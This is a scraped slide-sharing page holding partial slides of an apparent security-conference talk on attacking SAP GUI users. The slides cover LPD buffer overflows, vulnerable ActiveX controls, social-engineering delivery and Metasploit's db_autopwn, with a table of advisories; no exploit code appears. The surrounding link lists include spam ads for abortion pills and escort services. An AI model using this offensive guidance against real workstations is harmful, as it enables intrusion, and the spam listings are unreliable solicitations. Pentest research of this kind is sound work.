Preventing Vulnerabilities in SAP HANA based DeploymentsPreventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based DeploymentsOnapsis Inc.
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPERPScan
 
Incident Response and SAP Systems
Incident Response and SAP SystemsIncident Response and SAP Systems
Incident Response and SAP SystemsOnapsis Inc.
 
Dissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI FrameworksDissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI FrameworksOnapsis Inc.
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPERPScan
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsERPScan
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 stepsERPScan
 

What's hot (20)

Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP Systems
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to us
 
If I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second editionIf I want a perfect cyberweapon, I'll target ERP - second edition
If I want a perfect cyberweapon, I'll target ERP - second edition
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscape
 
SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big business
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
 
SAP SDM Hacking
SAP SDM HackingSAP SDM Hacking
SAP SDM Hacking
 
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC) Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
Attacks to SAP Web Applications: Your crown jewels online (BlackHat DC)
 
Attacking SAP Mobile
Attacking SAP MobileAttacking SAP Mobile
Attacking SAP Mobile
 
How Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the JewelsHow Hackers can Open the Safe and Take the Jewels
How Hackers can Open the Safe and Take the Jewels
 
SAP (in)security: New and best
SAP (in)security: New and bestSAP (in)security: New and best
SAP (in)security: New and best
 
Blended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory PlatformsBlended Web and Database Attacks on Real Time In-memory Platforms
Blended Web and Database Attacks on Real Time In-memory Platforms
 
Assessing and Securing SAP Solutions
Assessing and Securing SAP SolutionsAssessing and Securing SAP Solutions
Assessing and Securing SAP Solutions
 
Preventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based DeploymentsPreventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based Deployments
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERP
 
Incident Response and SAP Systems
Incident Response and SAP SystemsIncident Response and SAP Systems
Incident Response and SAP Systems
 
Dissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI FrameworksDissecting and Attacking RMI Frameworks
Dissecting and Attacking RMI Frameworks
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applications
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 steps
 

Viewers also liked

Vanden Boeynants kreeg schouderklopje van VS
Vanden Boeynants kreeg schouderklopje van VSVanden Boeynants kreeg schouderklopje van VS
Vanden Boeynants kreeg schouderklopje van VSThierry Debels
 
OptinContacts: SAP Users List
OptinContacts: SAP Users ListOptinContacts: SAP Users List
OptinContacts: SAP Users ListRochelle williams
 
Danielle Tronnes 2016 resume
Danielle Tronnes 2016 resumeDanielle Tronnes 2016 resume
Danielle Tronnes 2016 resumeDanielle Tronnes
 
Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)ERPScan
 
Media pembelajaran usaha dan energi
Media pembelajaran usaha dan energiMedia pembelajaran usaha dan energi
Media pembelajaran usaha dan energirahmiyati95
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERPScan
 
Pen Testing SAP Critical Information Exposed
Pen Testing SAP Critical Information ExposedPen Testing SAP Critical Information Exposed
Pen Testing SAP Critical Information ExposedOnapsis Inc.
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...ERPScan
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)ERPScan
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figuresERPScan
 
Our Tuataras
Our TuatarasOur Tuataras
Our TuatarasCPS_Rm09
 

Viewers also liked (12)

Vanden Boeynants kreeg schouderklopje van VS
Vanden Boeynants kreeg schouderklopje van VSVanden Boeynants kreeg schouderklopje van VS
Vanden Boeynants kreeg schouderklopje van VS
 
OptinContacts: SAP Users List
OptinContacts: SAP Users ListOptinContacts: SAP Users List
OptinContacts: SAP Users List
 
Danielle Tronnes 2016 resume
Danielle Tronnes 2016 resumeDanielle Tronnes 2016 resume
Danielle Tronnes 2016 resume
 
B&G Guide (Final)
B&G Guide (Final)B&G Guide (Final)
B&G Guide (Final)
 
Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)Breaking SAP portal (DeepSec)
Breaking SAP portal (DeepSec)
 
Media pembelajaran usaha dan energi
Media pembelajaran usaha dan energiMedia pembelajaran usaha dan energi
Media pembelajaran usaha dan energi
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, Solutions
 
Pen Testing SAP Critical Information Exposed
Pen Testing SAP Critical Information ExposedPen Testing SAP Critical Information Exposed
Pen Testing SAP Critical Information Exposed
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figures
 
Our Tuataras
Our TuatarasOur Tuataras
Our Tuataras
 

Similar to Attacking SAP users with sapsploit

CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usPROIDEA
 
Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 stepsERPScan
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPERPScan
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsERPScan
 
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineBreaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineERPScan
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsERPScan
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easyERPScan
 
OWASP Poland Day 2018 - Andrzej Dyjak - Zero Trust Theorem
OWASP Poland Day 2018 - Andrzej Dyjak - Zero Trust TheoremOWASP Poland Day 2018 - Andrzej Dyjak - Zero Trust Theorem
OWASP Poland Day 2018 - Andrzej Dyjak - Zero Trust TheoremOWASP
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC ProjectERPScan
 
SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating ERPScan
 
Představení Oracle SPARC Miniclusteru
Představení Oracle SPARC MiniclusteruPředstavení Oracle SPARC Miniclusteru
Představení Oracle SPARC MiniclusteruMarketingArrowECS_CZ
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombPriyanka Aash
 
Securing your web applications a pragmatic approach
Securing your web applications a pragmatic approachSecuring your web applications a pragmatic approach
Securing your web applications a pragmatic approachAntonio Parata
 
A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. ERPScan
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)ERPScan
 
network-management Web base.ppt
network-management Web base.pptnetwork-management Web base.ppt
network-management Web base.pptAssadLeo1
 

Similar to Attacking SAP users with sapsploit (20)

CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
 
Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 steps
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAP
 
OWASP
OWASPOWASP
OWASP
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applications
 
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE EngineBreaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platforms
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
 
OWASP Poland Day 2018 - Andrzej Dyjak - Zero Trust Theorem
OWASP Poland Day 2018 - Andrzej Dyjak - Zero Trust TheoremOWASP Poland Day 2018 - Andrzej Dyjak - Zero Trust Theorem
OWASP Poland Day 2018 - Andrzej Dyjak - Zero Trust Theorem
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating
 
ICS Threat Scenarios
ICS Threat ScenariosICS Threat Scenarios
ICS Threat Scenarios
 
Představení Oracle SPARC Miniclusteru
Představení Oracle SPARC MiniclusteruPředstavení Oracle SPARC Miniclusteru
Představení Oracle SPARC Miniclusteru
 
OWASP an Introduction
OWASP an Introduction OWASP an Introduction
OWASP an Introduction
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Securing your web applications a pragmatic approach
Securing your web applications a pragmatic approachSecuring your web applications a pragmatic approach
Securing your web applications a pragmatic approach
 
A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine.
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)
 
network-management Web base.ppt
network-management Web base.pptnetwork-management Web base.ppt
network-management Web base.ppt
 

Recently uploaded

The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AIABDERRAOUF MEHENNI
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...Health
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionSolGuruz
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxbodapatigopi8531
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...OnePlan Solutions
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceanilsa9823
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 

Recently uploaded (20)

The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
Hand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptxHand gesture recognition PROJECT PPT.pptx
Hand gesture recognition PROJECT PPT.pptx
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 

Attacking SAP users with sapsploit

  • 1. Invest  in  security   to  secure  investments   SAP  Security:A-acking  SAP   users  with  sapsploit     Alexander  Polyakov.    
  • 2. About  ERPScan   •  The   only   360-­‐degree   SAP   Security   soluAon   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presenta=ons  key  security  conferences  worldwide   •  25  Awards  and  nomina=ons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
  • 3. Intro     •  Business  applica,ons  like  ERP,  CRM,  SRM  and  others  are  one  of   the  major  topics  within  the  field  of  computer  security  as  these   applica,ons  store  business  data  and  any  vulnerability  in  these   applica,ons  can  cause  a  significant  monetary  loss  or  even   stoppage  of  business.     Nonetheless  people  sAll  do  not  give  much  a-enAon  to  the   technical  side  of  SAP  security.         3  
  • 4. Main  problems  in  ERP  security     •  ERP  systems  have  a  complex  structure  (complexity  kills   security  )     •  Mostly  available  inside  a  company  (closed  world)     •  Contain  many  different  vulnerabiliAes  in  all  the  levels  from     •  network  to  applicaAon     •  Rarely  updated  because  administrators  are  scared  they  can  be   broken  during  updates     4  
  • 6. SAP  Security:  Pentester’s  view     AbstracAon  Levels     •  Network   •  OS   •  Database   •  AplicaAon(BASIS)   •  AddiAonal  services  (igs,j2ee  telnet)     •  Client-­‐side     6  
  • 7. SAP  Security:  Pentester’s  view     •  Very  Very  Very  Very  Very  huge  area   •  Impossible  to  describe  it  all  in  one  hour     •  You  can  start  with:     –  Sap  security  Guides  and  Sap  security  notes   –  My  previous  talk  “Some  notes  on  SAP  security”  from  Troopers  2010  •   –  Mariano  Nunez  Di  Croce  presentaAons  from  Black  Hat  and  HITB     7  
  • 8. Real  life  situa=on:     During  one  of  our  sap  penetra,on  tests  we  found  that  SAP   infrastructure  was  securely  separated  from  users  network  so  one  of   the  possible  ways  to  aFack  this  network  was  geGng  access  to   users  worksta,ons  which  can  get  access  to  SAP  servers     8  
  • 9. Why  aQack  Users     •  Users  are  less  secure     •  There  are  thousands  SAP  users  in  one  company     •  U  can  a-ack  them  even  if  Server  is  fully  secured     •  U  can  a-ack  them  from  outside     •  U  can  use  them  as  proxy  for  a-acking  servers     •  They  are  stupid  )     9  
  • 10. AQacking  SAP  Users   SAP  users  may  connect  using:   •  SAPGUI   •  JAVAGUI   •  WEBGUI  (Browser)   •  RFC     •  ApplicaAons  such  as  VisualAdmin,  Mobile  client  and  many  many   other  stufff   10  
  • 11. SAP  GUI  overview   •  SAP  GUI  —  Common  applicaAon  for  connecAng  to  SAP   •  Very  widespread  almost  at  any  SAP  workstaAon  in  a  company   (hundreds  or  thousands  of  installaAons)   •  Don’t  have  simple  autoupdate  (instead  of    MS  products,  AV,   flash  etc)   •  Not  so  popular  usually  never  updated  or  updated  very  rarely   11  
  • 12. 12   AFacking  SAPGUI  clients  
  • 13. Common  Vulnerabili=es   •  SAP  LPD  overflows   •  AcAveX  overflows   •  Other  AcAveX  vulnerabiliAes   •  Sap  shortcuts   •  Data  sniffing   13  
  • 14. SAP  LPD  Vulnerabili=es   •  Components  for  enabling  printer  opAons  in  SAP   •  MulAple  buffer  overflow  vulnerabiliAes  by  Luigi  Auriemma  (  4   feb  2008)   •  VulnerabiliAes  were  found  SAPlpd  protocol     •  It  allowed  an  a-acker  to  receive  the  full  remote  control  over   the  vulnerable  system   •  h-p://aluigi.altervista.org/adv/saplpdz-­‐adv.txt   14   According  to  our  sta,s,cs  of  security  assessments  in  2009  about   30%  of  worksta,ons  are  vulnerable    
  • 15. SAP  LPD  Vulnerabili=es  in  details     •  There  are  thousands  of  workstaAons  in  a  company  so  you  have   a  great  chance  that  using  Metasploit  module  db_autopwn  you   can  exploit  somebody     15  
  • 16. Ac=veX  Vulnerabili=es   •  There  are  about  1000  AcAveX  controls  installed  with  SAP  GUI   •  Any  of  them  can  potenAally  have  a  vulnerability   •  User  interacAon  is  needed.  (the  link  could  be  sent  by  e-­‐mail,   ICQ  ,o,tweet.)   •  The  vulnerable  component  will  be  executed  in  the  context  of  a   browser  of  a  vicAm  which  is  frequently  started  under  the   administraAve  rights   •  Using  social  engineering  scenarios  it  can  be  about  10-­‐50%  of   exploitaAon  depending  on  AcAveX  scenario  and  users     awareness   16  
  • 17. Date   Vulnerable   Component Author Vulnerability Link 04.01.2007 rfcguisink  Mark  Litchfield   BOF h-p://www.ngssosware.com/advisories/high-­‐risk-­‐vulnerability-­‐in-­‐enjoysap-­‐ stack-­‐overflow/   04.01.2007 Kwedit  Mark  Litchfield BOF h-p://www.ngssosware.com/advisories/high-­‐risk-­‐vulnerability-­‐in-­‐enjoysap-­‐ stack-­‐overflow/ 07.11.2008 mdrmsap  Will  Dormann     BOF h-p://www.securityfocus.com/bid/32186/info 07.01.2009 Sizerone  Carsten  Eiram BOF h-p://www.securityfocus.com/bid/33148/info 31.03.2009 WebWiewer3D  Will  Dormann     BOF h-p://www.securityfocus.com/bid/34310/info 15.04.2009 Kwedit Carsten  Eiram Insecure  Method h-p://secunia.com/secunia_research/2008-­‐56/ 08.06.2009 Sapirrfc  Alexander  Polyakov   BOF h-p://dsecrg.com/pages/vul/show.php?id=115 28.09.2009 WebWiewer3D Alexander  Polyakov   Insecure  Method h-p://dsecrg.com/pages/vul/show.php?id=143   28.09.2009 WebWiewer2D Alexander  Polyakov   Insecure  Method h-p://dsecrg.com/pages/vul/show.php?id=144    07.10.2009 